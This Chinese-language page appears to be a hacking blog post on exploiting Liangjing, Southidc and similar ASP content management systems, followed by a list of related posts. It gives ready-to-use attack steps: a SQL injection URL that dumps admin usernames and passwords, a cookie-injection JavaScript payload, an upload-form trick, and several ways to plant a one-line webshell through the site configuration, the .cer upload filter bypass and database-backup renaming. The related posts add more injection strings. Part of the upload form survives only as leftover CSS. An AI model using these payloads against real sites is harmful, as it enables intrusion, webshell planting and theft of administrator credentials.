良精cms php版漏洞,南方数据、良精系统、网软天下漏洞利用
1、通过upfile_other.asp漏洞文件直接取SHELL
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
encType=multipart/form-data>
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
注:此方法通杀南方数据、良精系统、网软天下等
2、通过注入秒杀管理员帐号密码,使用如下:
http://www.0day5.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
在网站配置[http://www.0day5.com/admin/SiteConfig.asp]的版权信息里写入 "%>
这里一句话chr(32)密码是“#”
3、cookie注入
清空地址栏,利用union语句来注入,提交:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
三、后台取SHELL方法总结
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%>
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
这时再打开一句话马的客户端,提交同样得到一个小马
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
EnableUpload=false
end if
if EnableUpload=false then
msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType
FoundErr=true
end if
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
直接访问备份后的地址,就得到一个webshell
(4)后台编辑器
找到路径后,直接访问admin_style.asp,修改样式,然后预览,上传所需要的格式即可
良精cms php版漏洞,南方数据、良精系统、网软天下漏洞利用相关推荐
- 良精cms php版漏洞,Phpcms 2008 漏洞整理
盲注 flash_upload.php?modelid=1 product.php pagesize参数代码注射漏洞 yp/product.php?pagesize=${@print(md5(admi ...
- 南方数据编辑器southidceditor最新注入0day漏洞
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from adm ...
- Arduino十大滤波算法程序大全(精编无错版)
Arduino十大滤波算法程序大全(精编无错版) [转载]https://www.geek-workshop.com/thread-7694-1-1.html 限幅滤波法(程序判断滤波法) 中位值滤波 ...
- AI,大数据,复杂系统 最精 40本大书单
AI,大数据,复杂系统 最精 40本大书单 原创 2017-10-30 Peter 混沌巡洋舰 如果这篇文的题目变成最全书单,那么这篇文会变得又臭又长,这个年代,关于人工智能和大数据的书,没有一万本也 ...
- 网络管理必备工具软件精解(Windows版)---转载及个人见解
网络管理必备工具软件精解(Windows版) 出版社: 人民邮电出版社 作者: 刘晓辉 王淑江 出版日期:2006年3月 国标编号:ISBN 7-115-14546 条形码: 字数:899千字 印张: ...
- 尖端之作看逐浪-Zoomla!逐浪CMS python版发布
Python是跻身于当代IT世界最流行和代码最高效的编程语言之一. 带着对技术的卓越追求.对客户的承诺.对品质的极致追求.对科技的敬重.对未来的向往,Zoomla!逐浪CMS团队在2021年到来之际, ...
- Linux各发行版流行度统计数据与排名
2011-11-28 09:55:46 第1页 Linux各发行版流行度统计数据与排名 DistroWatch是一个专门收集Linux发行版信息的网站,统计各个 Linux 发行版的流行度,通过统计各 ...
- 美征信巨头Equifax因Struts漏洞导致数据大规模泄露
各新闻机构和在线新闻网站都报道了黑客从征信企业Equifax窃取了1.43亿美国人的详细个人信息,这一事件表明Apache Struts框架存在安全缺陷.Struts是一种开源的MVC框架,用于创建基 ...
- List精讲(Java版)·算法常用集合处理方法
List精讲(Java版)·算法常用集合处理方法 请仔细查阅每一个注释: import java.util.ArrayList; import java.util.Collections; impor ...
最新文章
- SpringMVC工作原理
- SQL中ISNULL的问题。
- PyQt5-关闭窗体显示提示框(窗口界面显示器上居中)-5
- 计算机组成原理第一阶段测试,计算机组成原理随堂测验1附答案
- IDEA開發 java web 初步
- 俄罗斯方块剖析之一总体计划
- JConsole的使用手册 JDK1.5(转)
- 如何部署前端react项目到服务器,Vue、React前端项目打包部署
- linux内核 快速分片,linux内核学习笔记------ip报文的分片
- 让人头皮发麻的KMP的next函数 困扰我三四天后终于解决了
- php汉字转拼音百家姓版,Pinyin4Net: .net(core)使用的汉字转拼音库(含姓名拼音独立接口)。提供了简单的调用接口和通过拼音查询汉字的接口。...
- java file.length 单位_Java File length()方法
- java 背单词系统_快速高效背单词系统方法论
- LeetCode - 441 - 排列硬币(arranging-coins)
- 使用CSS写正方体,结合JS实现3D轮播图
- 漂亮的蓝色风格网页设计作品欣赏(系列二)
- 用python和sympy库解决方程组问题_使用 Python 解数学方程
- 阿里程序员,过完年第一天就要被劝退!让人感觉现实是如此残酷!
- 【海外APP】Twitch 全球首屈一指的游戏直播平台
- apktools使用
热门文章
- 学习记录之revised maunscript 和 response letter
- 使用STM32内部ADC资源读取环境光传感器
- 参考文献格式字号字体_论文参考文献标准格式字体大小
- Fritzing软件绘制Arduino面包板接线图传感器模块库文件292
- 基于java+jsp+ssm餐饮管理系统-计算机毕业设计
- 从零开始搭建仿抖音短视频APP--开发用户业务模块(4)
- 《第五元素》女高音的歌曲
- 计算机数据库服务器名,附加数据库 对于 服务器“服务器计算机名”失败。 (Microsoft.SqlServer.Smo)...
- pr制作片尾滚动字幕
- 传奇登陆器只有1024x768的分辩率,登陆器多个分辩率设置方法